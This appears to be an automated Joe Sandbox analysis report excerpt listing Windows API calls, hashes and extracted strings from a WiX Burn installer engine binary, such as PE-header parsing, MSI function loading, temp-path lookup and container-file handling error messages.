                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,008E6C5C,00000000,008E6570), ref: 008EDBD8
                                                                                                                                                                                                                                                                            • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,?,008E6C5C,00000000,008E6570), ref: 008EDC2A
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,008E6C5C,00000000,008E6570), ref: 008EDC34
                                                                                                                                                                                                                                                                            • ReadFile.KERNELBASE(008E6570,008E6C78,00000040,?,00000000,?,?,?,008E6C5C,00000000,008E6570), ref: 008EDC84
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,008E6C5C,00000000,008E6570), ref: 008EDC8E
                                                                                                                                                                                                                                                                            • SetFilePointerEx.KERNELBASE(008E6570,008E6570,?,00000000,00000000,?,?,?,008E6C5C,00000000,008E6570), ref: 008EDCF4
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,008E6C5C,00000000,008E6570), ref: 008EDCFE
                                                                                                                                                                                                                                                                            • ReadFile.KERNELBASE(008E6570,?,00000018,00000040,00000000,?,00000000,00000000,?,?,?,008E6C5C,00000000,008E6570), ref: 008EDD51
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,008E6C5C,00000000,008E6570), ref: 008EDD5B
                                                                                                                                                                                                                                                                            • SetFilePointerEx.KERNELBASE(008E6570,008E64D8,00000000,00000000,00000000,?,00000000,00000000,?,?,?,008E6C5C,00000000,008E6570), ref: 008EDDD5
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,008E6C5C,00000000,008E6570), ref: 008EDDDF
                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(008E6570,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,008E6C5C,00000000,008E6570), ref: 008EDE32
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,008E6C5C,00000000,008E6570), ref: 008EDE3C
                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(008E6570,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,008E6C5C,00000000,008E6570), ref: 008EDE8F
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,008E6C5C,00000000,008E6570), ref: 008EDE99
                                                                                                                                                                                                                                                                            • SetFilePointerEx.KERNELBASE(008E6570,008E6570,00000000,00000000,00000000,?,00000000,00000000,?,?,?,008E6C5C,00000000,008E6570), ref: 008EDEEE
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,008E6C5C,00000000,008E6570), ref: 008EDEF8
                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(008E6570,?,00000028,00000018,00000000,?,00000000,00000000,?,?,?,008E6C5C,00000000,008E6570), ref: 008EDF52
                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(008E6570,?,00000028,00000028,00000000,?,00000000,00000000,?,?,?,008E6C5C,00000000,008E6570), ref: 008EDFB2
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,008E6C5C,00000000,008E6570), ref: 008EDFBC
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorFileLast$Read$Pointer
                                                                                                                                                                                                                                                                            • String ID: ($.wix$4$Failed to allocate buffer for section info.$Failed to allocate memory for container sizes.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get total size of bundle.$Failed to open handle to engine process path.$Failed to read DOS header.$Failed to read NT header.$Failed to read complete image section header, index: %u$Failed to read complete section info.$Failed to read image section header, index: %u$Failed to read section info, data too short: %u$Failed to read section info, unsupported version: %08x$Failed to read section info.$Failed to read signature offset.$Failed to read signature size.$Failed to seek past optional headers.$Failed to seek to NT header.$Failed to seek to section info.$Failed to seek to start of file.$Invalid section info, cContainers too large: %u$PE$PE Header from file didn't match PE Header in memory.$burn$d:\a\wix4\wix4\src\burn\engine\section.cpp$feclient.dll
                                                                                                                                                                                                                                                                            • API String ID: 3909885910-3741805499
                                                                                                                                                                                                                                                                            • Opcode ID: f6885d8c18fc4dbf16d697d1aadc60ddb9739ec0621419ebe0574d3c01252c64
                                                                                                                                                                                                                                                                            • Instruction ID: e4da54b9503f1a087d6e553827771cbb3151c950d34499587c2afa8d776143ba
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f6885d8c18fc4dbf16d697d1aadc60ddb9739ec0621419ebe0574d3c01252c64
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 49220772A41374B7D731CA168C4AFABB6A8FB07B55F014159FE08FB280E6B09D44CB95

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • InitializeCriticalSection.KERNEL32(0090401A,008E7D5B,x86,008E7DDB), ref: 008EAA8F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalInitializeSection
                                                                                                                                                                                                                                                                            • String ID: #$$$'$0$Date$Failed to add built-in variable: %ls.$Failed to add well-known variable: %ls.$InstallerName$InstallerVersion$LogonUser$RebootPending$SeShutdownPrivilege$WixBundleAction$WixBundleActiveParent$WixBundleCommandLineAction$WixBundleElevated$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$WixBundleForcedRestartPackage$WixBundleInProgressName$WixBundleInstalled$WixBundleLastUsedSource$WixBundleLayoutDirectory$WixBundleManufacturer$WixBundleName$WixBundleOriginalSource$WixBundleOriginalSourceFolder$WixBundleProviderKey$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleTag$WixBundleUILevel$WixBundleVersion$d:\a\wix4\wix4\src\burn\engine\variable.cpp$x86
                                                                                                                                                                                                                                                                            • API String ID: 32694325-1675731463
                                                                                                                                                                                                                                                                            • Opcode ID: 436068943a535bcdf98cb1f9ea5a2e3261b98603daf77d3299e48e151bce677d
                                                                                                                                                                                                                                                                            • Instruction ID: cfab39c2058caaf4042f17746542bcc8da96d4beb529d66bea1f04feb66a7ba9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 436068943a535bcdf98cb1f9ea5a2e3261b98603daf77d3299e48e151bce677d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0C526BB0C117689FDB61CF5ACD487CDBAF8BB49709F5085DAE64CA6250D7B00A88CF85

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?,?,?,?,0090DE75,?,?), ref: 0090E395
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,0090DE75,?,?), ref: 0090E39F
                                                                                                                                                                                                                                                                            • ResetEvent.KERNEL32(?,?,000000FF,?,?,?,?,0090DE75,?,?), ref: 0090E41C
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,0090DE75,?,?), ref: 0090E426
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorEventLast$Reset
                                                                                                                                                                                                                                                                            • String ID: @1Wu$Failed to allocate buffer for stream.$Failed to copy stream name: %hs$Failed to create file: %ls$Failed to reset begin operation event.$Failed to set end of file.$Failed to set file pointer to beginning of file.$Failed to set file pointer to end of file.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$d:\a\wix4\wix4\src\burn\engine\cabextract.cpp
                                                                                                                                                                                                                                                                            • API String ID: 1970322416-2021767095
                                                                                                                                                                                                                                                                            • Opcode ID: 04ccd43e12d9ef657e129c84311cf728386e52b2221c87ad72d744e92fe4a830
                                                                                                                                                                                                                                                                            • Instruction ID: 716e7c81072bc34a13cfd64c20063a263401e21f45ca1517bc2dda73a09eb484
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 04ccd43e12d9ef657e129c84311cf728386e52b2221c87ad72d744e92fe4a830
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ACA12576AC1731BBEB3257695C4EF6B2C68EB46F20F120914BE14BF2D1E6A4DC0092D5

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateFileW.KERNELBASE(00000000,40000000,00000005,00000000,00000002,08000080,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?), ref: 008FCDBB
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008FCDC8
                                                                                                                                                                                                                                                                              • Part of subcall function 00942B2E: ReadFile.KERNELBASE(?,?,00000000,?,00000000,?), ref: 00942BBF
                                                                                                                                                                                                                                                                            • SetFilePointerEx.KERNEL32(00000000,0094E818,00000000,00000000,00000000,?,00000000,0094E860,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 008FCEA1
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008FCEAB
                                                                                                                                                                                                                                                                            • CloseHandle.KERNELBASE(00000000,?,00000000,0094E860,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 008FD04E
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$ErrorLast$CloseCreateHandlePointerRead
                                                                                                                                                                                                                                                                            • String ID: Failed to copy engine from: %ls to: %ls$Failed to create engine file at path: %ls$Failed to seek to beginning of engine file: %ls$Failed to seek to checksum in exe header.$Failed to seek to original data in exe burn section header.$Failed to seek to signature table in exe header.$Failed to update signature offset.$Failed to zero out original data offset.$cabinet.dll$d:\a\wix4\wix4\src\burn\engine\cache.cpp$msi.dll$.Wu@1Wu

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008E1839: LoadLibraryExW.KERNEL32(?,00000000,00000800,00000000,?,008E1645,?,?,?,?,?,?,008E115A,cabinet.dll,00000009,?), ref: 008E1855
                                                                                                                                                                                                                                                                              • Part of subcall function 008E1839: GetLastError.KERNEL32(?,008E1645,?,?,?,?,?,?,008E115A,cabinet.dll,00000009,?,?,00000000), ref: 008E1866
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00946376
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000), ref: 0094638E
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000001,00000004,00000001,TEMP,00000000,80000002,System\CurrentControlSet\Control\Session Manager\Environment,00020019,00000000), ref: 0094658F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to get system Windows subdirectory path SystemTemp., xrefs: 009463CB
                                                                                                                                                                                                                                                                            • Failed to get temp path from system TEMP., xrefs: 009464DE
                                                                                                                                                                                                                                                                            • Failed to check if running as system., xrefs: 009463A0
                                                                                                                                                                                                                                                                            • Failed to ensure array size for system TMP value., xrefs: 009464A6
                                                                                                                                                                                                                                                                            • kernel32.dll, xrefs: 0094633E
                                                                                                                                                                                                                                                                            • TMP, xrefs: 00946469
                                                                                                                                                                                                                                                                            • SystemTemp, xrefs: 009463BB
                                                                                                                                                                                                                                                                            • Failed to get temp path from system TMP., xrefs: 0094647C
                                                                                                                                                                                                                                                                            • Failed to ensure array size for Windows\TEMP value., xrefs: 00946559
                                                                                                                                                                                                                                                                            • Failed to open system environment registry key., xrefs: 0094644C
                                                                                                                                                                                                                                                                            • System\CurrentControlSet\Control\Session Manager\Environment, xrefs: 0094641A
                                                                                                                                                                                                                                                                            • Failed to ensure array size for system TEMP value., xrefs: 00946505
                                                                                                                                                                                                                                                                            • Failed to ensure array size for Windows\SystemTemp value., xrefs: 009463F0
                                                                                                                                                                                                                                                                            • Failed to get system Windows subdirectory path TEMP., xrefs: 00946537
                                                                                                                                                                                                                                                                            • TEMP, xrefs: 009464CB, 00946527
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\path3utl.cpp, xrefs: 0094635A, 00946565
                                                                                                                                                                                                                                                                            • Failed to load kernel32.dll, xrefs: 0094634E
                                                                                                                                                                                                                                                                            • GetTempPath2W, xrefs: 0094636E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressCloseCurrentErrorLastLibraryLoadProcProcess
                                                                                                                                                                                                                                                                            • String ID: Failed to check if running as system.$Failed to ensure array size for Windows\SystemTemp value.$Failed to ensure array size for Windows\TEMP value.$Failed to ensure array size for system TEMP value.$Failed to ensure array size for system TMP value.$Failed to get system Windows subdirectory path SystemTemp.$Failed to get system Windows subdirectory path TEMP.$Failed to get temp path from system TEMP.$Failed to get temp path from system TMP.$Failed to load kernel32.dll$Failed to open system environment registry key.$GetTempPath2W$SystemTemp$System\CurrentControlSet\Control\Session Manager\Environment$TEMP$TMP$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\path3utl.cpp$kernel32.dll

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(MsiDeterminePatchSequenceW,00000000), ref: 0093F607
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(MsiDetermineApplicablePatchesW), ref: 0093F62B
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(MsiEnumProductsExW), ref: 0093F64F
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(MsiGetPatchInfoExW), ref: 0093F673
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(MsiGetProductInfoExW), ref: 0093F697
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(MsiSetExternalUIRecord), ref: 0093F6BB
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(MsiSourceListAddSourceExW), ref: 0093F6DF
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(MsiBeginTransactionW), ref: 0093F70C
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(MsiEndTransaction), ref: 0093F72B
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • MsiSourceListAddSourceExW, xrefs: 0093F6D4
                                                                                                                                                                                                                                                                            • Failed to load Msi.DLL, xrefs: 0093F5C9
                                                                                                                                                                                                                                                                            • MsiDetermineApplicablePatchesW, xrefs: 0093F620
                                                                                                                                                                                                                                                                            • MsiBeginTransactionW, xrefs: 0093F701
                                                                                                                                                                                                                                                                            • Msi.dll, xrefs: 0093F5B9
                                                                                                                                                                                                                                                                            • MsiGetProductInfoExW, xrefs: 0093F68C
                                                                                                                                                                                                                                                                            • MsiDeterminePatchSequenceW, xrefs: 0093F5FC
                                                                                                                                                                                                                                                                            • MsiEndTransaction, xrefs: 0093F720
                                                                                                                                                                                                                                                                            • MsiSetExternalUIRecord, xrefs: 0093F6B0
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\wiutil.cpp, xrefs: 0093F5D8
                                                                                                                                                                                                                                                                            • MsiEnumProductsExW, xrefs: 0093F644
                                                                                                                                                                                                                                                                            • MsiGetPatchInfoExW, xrefs: 0093F668
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressProc
                                                                                                                                                                                                                                                                            • String ID: Failed to load Msi.DLL$Msi.dll$MsiBeginTransactionW$MsiDetermineApplicablePatchesW$MsiDeterminePatchSequenceW$MsiEndTransaction$MsiEnumProductsExW$MsiGetPatchInfoExW$MsiGetProductInfoExW$MsiSetExternalUIRecord$MsiSourceListAddSourceExW$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\wiutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 190572456-4147843358
                                                                                                                                                                                                                                                                            • Opcode ID: 6f0e6d828f6af0636e6623d16e2eb252e77f7b4a0c9afaefe45f295b09e9a612
                                                                                                                                                                                                                                                                            • Instruction ID: f50bc6f108ddd1478a8b69a1f37876d78b82a8b88641c0c6ae846dd93b59bebe
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f0e6d828f6af0636e6623d16e2eb252e77f7b4a0c9afaefe45f295b09e9a612
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A41A1BA96B204AFEB11AF20ED1BB153AB5FF61749F104129E00DA91B0E3B119C0FF44

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(00000000,00000000,00000000,?,?,008FA80F,?,?,00000001,00000000,00000008,?,00000000,00000000,?,?), ref: 008E83FF
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(00000000,00000000,?,0094E908,00000000,00000000,00000000,00000008,00000000,00000000,00000008,?,00000000,00000008,?,?), ref: 008E8A11
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                            • String ID: *****$Failed to allocate buffer for format string.$Failed to allocate record.$Failed to allocate string.$Failed to allocate variable array.$Failed to append placeholder.$Failed to append string.$Failed to copy string.$Failed to determine variable visibility: '%ls'.$Failed to format placeholder string.$Failed to format record.$Failed to get formatted length.$Failed to get variable name.$Failed to length of format string.$Failed to reallocate variable array.$Failed to set record format string.$Failed to set record string.$Failed to set variable value.$[%d]$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3168844106-2252141963
                                                                                                                                                                                                                                                                            • Opcode ID: 13a4a189e57749c01c67215e081044babb1ac906d21779d85284546ffefb7d32
                                                                                                                                                                                                                                                                            • Instruction ID: 135b371aca4426558c4792b62a42823cf730b2bce62d503e2b9452caad0dc479
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 13a4a189e57749c01c67215e081044babb1ac906d21779d85284546ffefb7d32
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C12E971E41269FADB10DF968C45FBF7AA8FB46B55F110025FE04FB180DA709E009BA5

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • IsWindow.USER32(0094E7C0), ref: 008E76BB
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(0094E7C0,00000010,00000000,00000000), ref: 008E76CE
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 008E76DD
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(008E7EA1), ref: 008E76F2
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 008E7703
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 008E7711
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseHandle$MessagePostWindow
                                                                                                                                                                                                                                                                            • String ID: "%ls" %ls$Failed to allocate full command-line.$Failed to cache to clean room.$Failed to create clean room command-line.$Failed to get path for current process.$Failed to launch clean room process: %ls$Failed to open clean room log.$Failed to wait for clean room process: %ls$d:\a\wix4\wix4\src\burn\engine\engine.cpp$msasn1.dll$version.dll$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 2982985107-2647716674
                                                                                                                                                                                                                                                                            • Opcode ID: 3e76f8423af8ffaf1ed41bec4b2cbdbcee0d065c9944fef4d0fc441337a00635
                                                                                                                                                                                                                                                                            • Instruction ID: 3ada6e4f8807d0912a4e563a44ef7ccac8ff78156f7af642712b505eeb1463f2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3e76f8423af8ffaf1ed41bec4b2cbdbcee0d065c9944fef4d0fc441337a00635
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B61E371E4465ABBDB12DBA9CC46FEEBB78FB05714F100115FA10F61D0D7B099408BA5

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,?,00000000,00000000,?,008EEE16,008E7D9B,?,?,008E7DDB), ref: 008EEC20
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,008EEE16,008E7D9B,?,?,008E7DDB,008E7DDB,00000000,?,00000000), ref: 008EEC31
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,?,00000000,00000000,?,008EEE16,008E7D9B,?,?,008E7DDB,008E7DDB,00000000,?), ref: 008EEC85
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(000000FF,00000000,?,008EEE16,008E7D9B,?,?,008E7DDB,008E7DDB,00000000,?,00000000), ref: 008EEC8F
                                                                                                                                                                                                                                                                            • DuplicateHandle.KERNELBASE(00000000,?,008EEE16,008E7D9B,?,?,008E7DDB,008E7DDB,00000000,?,00000000), ref: 008EEC96
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,008EEE16,008E7D9B,?,?,008E7DDB,008E7DDB,00000000,?,00000000), ref: 008EECA0
                                                                                                                                                                                                                                                                            • SetFilePointerEx.KERNELBASE(?,00000000,00000000,00000000,00000000,?,008EEE16,008E7D9B,?,?,008E7DDB,008E7DDB,00000000,?,00000000), ref: 008EECF1
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,008EEE16,008E7D9B,?,?,008E7DDB,008E7DDB,00000000,?,00000000), ref: 008EECFB
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast$CurrentFileProcess$CreateDuplicateHandlePointer
                                                                                                                                                                                                                                                                            • String ID: @1Wu$Failed to duplicate handle to container: %ls$Failed to move file pointer to container offset.$Failed to open container.$Failed to open file: %ls$crypt32.dll$d:\a\wix4\wix4\src\burn\engine\container.cpp$feclient.dll
                                                                                                                                                                                                                                                                            • API String ID: 2619879409-1228101344
                                                                                                                                                                                                                                                                            • Opcode ID: 64bea18118d4ecb9dc17c69e14e3384e26b34502cd35f77d8b07347f8aff2486
                                                                                                                                                                                                                                                                            • Instruction ID: 1971290fd143130aaf2fd70cdbf9c33355092b6d2672e531414b84967a5ff1f7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 64bea18118d4ecb9dc17c69e14e3384e26b34502cd35f77d8b07347f8aff2486
